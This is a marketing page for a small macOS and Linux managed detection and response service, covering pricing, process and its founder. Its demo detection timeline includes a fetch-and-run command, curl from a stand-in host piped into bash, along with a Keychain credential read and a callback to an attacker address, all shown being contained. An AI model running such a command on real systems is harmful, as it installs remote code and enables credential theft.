Best Cyber Solutions Request service

Managed Detection & Response · macOS and Linux

When something goes wrong on your Macs, we contain it.

Security monitoring for Mac- and Linux-first teams, from a single MacBook to about 50 people. Automated containment runs around the clock, and a named analyst, not a ticket queue, reviews every detection during business hours.

  • Mac & Linux first
  • No kernel driver
  • Threats, not employees
  • No minimum, from one machine
Mesh · Acme Design · mbp-07timeline
  1. Process bash/bin/bash -c curl -fsSL https://helpdesk-verify.example/fix.sh | bash
  2. Alert Download piped into a shellT1059.004
  3. Persist com.apple.crashreporter.helper~/Library/Application Support/.helper/helper
  4. Alert Chrome Safe Storage key read from the KeychainT1555.001
  5. Network helper -> 203.0.113.45:8081Example Hosting B.V. · uncommon port
  6. Auto Suspended helper and bashQuarantined the LaunchAgent and disabled its job · Blocked 203.0.113.45
  7. Status Status → investigatingfor analyst review at 8:00 ET
A fictional demo Mac, condensed from the real Mesh timeline and action log. See the full example.

Why teams call

Nobody buys security for fun. Something usually makes it urgent.

A security questionnaireAn enterprise customer asks whether you run endpoint detection and response. Now the answer is yes.
A cyber-insurance renewalCarriers now ask about EDR and monitoring, and price the policy on the answer.
SOC 2, HIPAA or an auditAuditors want monitoring, retained evidence and a record of how incidents were handled.
A close callSomething odd happened on a laptop, and nobody could say what it was or whether it's gone.

Services

Start by finding out what's already there. Then keep watching.

Ways to work together, priced for small teams and published up front.

Start here

Compromise Assessment

A one-week, read-only engagement that answers one question: Is anything already on your machines that shouldn't be?

From

$2,000 fixed fee

$500 is credited toward your first year if you continue within 60 days.

Contain

Continuous monitoring with automated response, business-hours human triage, ongoing threat hunting, a monthly report, and email or Slack escalation.

From

$99 / month

Includes up to 10 endpoints. Just you and a laptop? Solo covers up to three for $49.

Contain+

Everything in Contain, plus response policy tuning, a quarterly posture review, security-questionnaire help and priority escalation.

From

$149 / month

Includes up to 15 endpoints — just $50 a month more than Contain.

How it works

From first call to monitored fleet, in four steps.

  1. Assess

    Hunt for anything that got in before anyone was watching: Persistence, stolen credentials, live connections to attacker infrastructure.

  2. Deploy

    A lightweight agent on each Mac and Linux machine, rolled out in stages so nothing in your day-to-day breaks.

  3. Watch & contain

    Detections trigger an automated response within seconds. Every one is then reviewed by a person.

  4. Hunt & report

    We hunt for what no detection has caught yet, and every hunt goes in a monthly report written for the people who ask: Your customers, your insurer, your auditor.

What's different

Built for the companies the big vendors don't sell to.

Mac and Linux first

Detection written for LaunchAgents, TCC abuse, macOS infostealers and Linux persistence, not a Windows product with a Mac port bolted on.

We contain, not just alert

Every detection carries a response: Suspend the process, quarantine the file, block the address. An alert nobody acts on at 3am isn't protection.

No kernel driver

The agent runs entirely in user space, so it cannot blue-screen or boot-loop your fleet. After 2024, that's worth asking every vendor about.

Threats, not employees

We look for attackers, not productivity. What the agent collects is documented, and we'll show you exactly what leaves each machine.

A named human

You'll know exactly who is reading your alerts, and that person answers the phone. No tiered queue, no hand-offs, no starting over with someone new.

Sized for small teams

No minimum, and no bundled helpdesk you don't need. Built for companies with 5 to 50 machines.

Straight answers

What we are, and what we're not.

Plenty of vendors blur "24/7 protection" into "24/7 staffing". We don't, and the contract says the same thing this page does.

What you get

  • Automated detection and containment, around the clock
  • Human triage and investigation, 8am–6pm Eastern, Monday to Friday
  • Continuous threat hunting, with every hunt in your monthly report
  • Security questionnaire help on Contain+
  • Read-only visibility into every machine we watch, whenever you want it

What we're not

  • A 24/7 staffed security operations center
  • An incident-response retainer
  • An IT helpdesk or managed service provider
  • Coverage for Windows, yet. A Windows agent is in development, with no date promised.
Lonnie Best, founder of Best Cyber Solutions

Who picks up

“I spent a decade running detection and response for companies large enough to have a security team. This is for the ones that aren't, and deserve the same care.”
Lonnie Best, founder · former Director of Managed Detection & Response at Coalition

About Lonnie

Find out what is already on your machines.

We recommend starting with a one-week Compromise Assessment. $500 of it is credited if you continue into monitoring.